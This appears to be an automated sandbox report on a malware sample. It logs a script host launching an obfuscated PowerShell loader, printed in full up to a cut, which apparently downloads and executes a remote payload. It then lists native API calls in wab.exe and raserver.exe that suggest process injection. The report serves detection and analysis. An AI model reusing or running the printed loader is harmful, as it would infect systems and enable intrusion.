Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh Jump to behavior
Contains functionality to call native functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462AD0 NtReadFile,LdrInitializeThunk, 20_2_22462AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 20_2_22462BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462E80 NtReadVirtualMemory,LdrInitializeThunk, 20_2_22462E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 20_2_22462EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462F30 NtCreateSection,LdrInitializeThunk, 20_2_22462F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462FE0 NtCreateFile,LdrInitializeThunk, 20_2_22462FE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462F90 NtProtectVirtualMemory,LdrInitializeThunk, 20_2_22462F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462FB0 NtResumeThread,LdrInitializeThunk, 20_2_22462FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462C70 NtFreeVirtualMemory,LdrInitializeThunk, 20_2_22462C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462CA0 NtQueryInformationToken,LdrInitializeThunk, 20_2_22462CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462D10 NtMapViewOfSection,LdrInitializeThunk, 20_2_22462D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462D30 NtUnmapViewOfSection,LdrInitializeThunk, 20_2_22462D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462DD0 NtDelayExecution,LdrInitializeThunk, 20_2_22462DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462DF0 NtQuerySystemInformation,LdrInitializeThunk, 20_2_22462DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22464340 NtSetContextThread, 20_2_22464340
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22463010 NtOpenDirectoryObject, 20_2_22463010
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22463090 NtSetValueKey, 20_2_22463090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22464650 NtSuspendThread, 20_2_22464650
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224635C0 NtCreateMutant, 20_2_224635C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462AF0 NtWriteFile, 20_2_22462AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462AB0 NtWaitForSingleObject, 20_2_22462AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462B60 NtClose, 20_2_22462B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462BE0 NtQueryValueKey, 20_2_22462BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462B80 NtQueryInformationFile, 20_2_22462B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462BA0 NtEnumerateValueKey, 20_2_22462BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224639B0 NtGetContextThread, 20_2_224639B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462E30 NtWriteVirtualMemory, 20_2_22462E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462EE0 NtQueueApcThread, 20_2_22462EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462F60 NtCreateProcessEx, 20_2_22462F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462FA0 NtQuerySection, 20_2_22462FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462C60 NtCreateKey, 20_2_22462C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462C00 NtQueryInformationProcess, 20_2_22462C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462CC0 NtQueryVirtualMemory, 20_2_22462CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462CF0 NtOpenProcess, 20_2_22462CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22463D70 NtOpenThread, 20_2_22463D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462D00 NtSetInformationFile, 20_2_22462D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22463D10 NtOpenProcessToken, 20_2_22463D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462DB0 NtEnumerateKey, 20_2_22462DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0667CEB4 Sleep,NtProtectVirtualMemory, 20_2_0667CEB4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2235A036 NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread, 20_2_2235A036
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2239A036 NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread, 20_2_2239A036
Source: C:\Windows\explorer.exe Code function: 22_2_0B313232 NtCreateFile,NtReadFile, 22_2_0B313232
Source: C:\Windows\explorer.exe Code function: 22_2_0B314E12 NtProtectVirtualMemory, 22_2_0B314E12
Source: C:\Windows\explorer.exe Code function: 22_2_0B314E0A NtProtectVirtualMemory, 22_2_0B314E0A
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044835C0 NtCreateMutant,LdrInitializeThunk, 25_2_044835C0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04483090 NtSetValueKey,LdrInitializeThunk, 25_2_04483090
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482C60 NtCreateKey,LdrInitializeThunk, 25_2_04482C60
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482C70 NtFreeVirtualMemory,LdrInitializeThunk, 25_2_04482C70
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482CA0 NtQueryInformationToken,LdrInitializeThunk, 25_2_04482CA0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482D00 NtSetInformationFile,LdrInitializeThunk, 25_2_04482D00
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482D10 NtMapViewOfSection,LdrInitializeThunk, 25_2_04482D10
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482DD0 NtDelayExecution,LdrInitializeThunk, 25_2_04482DD0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482DF0 NtQuerySystemInformation,LdrInitializeThunk, 25_2_04482DF0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 25_2_04482EA0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482F30 NtCreateSection,LdrInitializeThunk, 25_2_04482F30
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482FE0 NtCreateFile,LdrInitializeThunk, 25_2_04482FE0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482AD0 NtReadFile,LdrInitializeThunk, 25_2_04482AD0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482AF0 NtWriteFile,LdrInitializeThunk, 25_2_04482AF0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482B60 NtClose,LdrInitializeThunk, 25_2_04482B60
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482BE0 NtQueryValueKey,LdrInitializeThunk, 25_2_04482BE0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 25_2_04482BF0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482BA0 NtEnumerateValueKey,LdrInitializeThunk, 25_2_04482BA0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04484650 NtSuspendThread, 25_2_04484650
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04483010 NtOpenDirectoryObject, 25_2_04483010
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04484340 NtSetContextThread, 25_2_04484340
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482C00 NtQueryInformationProcess, 25_2_04482C00
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482CC0 NtQueryVirtualMemory, 25_2_04482CC0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482CF0 NtOpenProcess, 25_2_04482CF0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04483D70 NtOpenThread, 25_2_04483D70
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04483D10 NtOpenProcessToken, 25_2_04483D10
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482D30 NtUnmapViewOfSection, 25_2_04482D30
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482DB0 NtEnumerateKey, 25_2_04482DB0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482E30 NtWriteVirtualMemory, 25_2_04482E30
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482EE0 NtQueueApcThread, 25_2_04482EE0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482E80 NtReadVirtualMemory, 25_2_04482E80
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482F60 NtCreateProcessEx, 25_2_04482F60
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482F90 NtProtectVirtualMemory, 25_2_04482F90
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482FA0 NtQuerySection, 25_2_04482FA0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482FB0 NtResumeThread, 25_2_04482FB0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044839B0 NtGetContextThread, 25_2_044839B0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482AB0 NtWaitForSingleObject, 25_2_04482AB0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482B80 NtQueryInformationFile, 25_2_04482B80
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA350 NtCreateFile, 25_2_001EA350
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA400 NtReadFile, 25_2_001EA400
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA480 NtClose, 25_2_001EA480
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA530 NtAllocateVirtualMemory, 25_2_001EA530
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA34A NtCreateFile, 25_2_001EA34A
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA3FA NtReadFile, 25_2_001EA3FA
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA47B NtClose, 25_2_001EA47B
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA52A NtAllocateVirtualMemory, 25_2_001EA52A
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041B9DDD NtReadVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtResumeThread,NtClose, 25_2_041B9DDD
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041BA036 NtQueryInformationProcess,NtReadVirtualMemory,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread, 25_2_041BA036
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041B9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 25_2_041B9BAF
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041B9DE2 NtReadVirtualMemory,NtProtectVirtualMemory, 25_2_041B9DE2
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041BA042 NtQueryInformationProcess, 25_2_041BA042
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041B9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 25_2_041B9BB2
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAAB78C2B2 12_2_00007FFAAB78C2B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAAB78B506 12_2_00007FFAAB78B506
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0474F1F0 16_2_0474F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0474FAC0 16_2_0474FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0474EEA8 16_2_0474EEA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_08262A60 16_2_08262A60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224352A0 20_2_224352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241D34C 20_2_2241D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EA352 20_2_224EA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E132D 20_2_224E132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F03E6 20_2_224F03E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E3F0 20_2_2243E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2247739A 20_2_2247739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DF0CC 20_2_224DF0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E70E9 20_2_224E70E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EF0E0 20_2_224EF0E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B8158 20_2_224B8158
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224FB16B 20_2_224FB16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2246516C 20_2_2246516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22420100 20_2_22420100
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224CA118 20_2_224CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E81CC 20_2_224E81CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F01AA 20_2_224F01AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243B1B0 20_2_2243B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E16CC 20_2_224E16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244C6E0 20_2_2244C6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22454750 20_2_22454750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430770 20_2_22430770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242C7C0 20_2_2242C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EF7B0 20_2_224EF7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E2446 20_2_224E2446
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22421460 20_2_22421460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EF43F 20_2_224EF43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DE4F6 20_2_224DE4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E7571 20_2_224E7571
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430535 20_2_22430535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F0591 20_2_224F0591
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224CD5B0 20_2_224CD5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EFA49 20_2_224EFA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E7A46 20_2_224E7A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A3A6C 20_2_224A3A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DDAC6 20_2_224DDAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242EA80 20_2_2242EA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224CDAAC 20_2_224CDAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22475AA0 20_2_22475AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EAB40 20_2_224EAB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EFB76 20_2_224EFB76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E6BD7 20_2_224E6BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A5BF0 20_2_224A5BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2246DBF9 20_2_2246DBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244FB80 20_2_2244FB80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22432840 20_2_22432840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243A840 20_2_2243A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249D800 20_2_2249D800
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224338E0 20_2_224338E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245E8F0 20_2_2245E8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224168B8 20_2_224168B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22439950 20_2_22439950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B950 20_2_2244B950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22446962 20_2_22446962
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224329A0 20_2_224329A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224FA9A6 20_2_224FA9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430E59 20_2_22430E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EEE26 20_2_224EEE26
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EEEDB 20_2_224EEEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22442E90 20_2_22442E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224ECE93 20_2_224ECE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22439EB0 20_2_22439EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A4F40 20_2_224A4F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EFF09 20_2_224EFF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22472F28 20_2_22472F28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22450F30 20_2_22450F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22422FC8 20_2_22422FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243CFE0 20_2_2243CFE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431F92 20_2_22431F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EFFB1 20_2_224EFFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430C00 20_2_22430C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A9C32 20_2_224A9C32
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22420CF2 20_2_22420CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EFCF2 20_2_224EFCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0CB5 20_2_224D0CB5
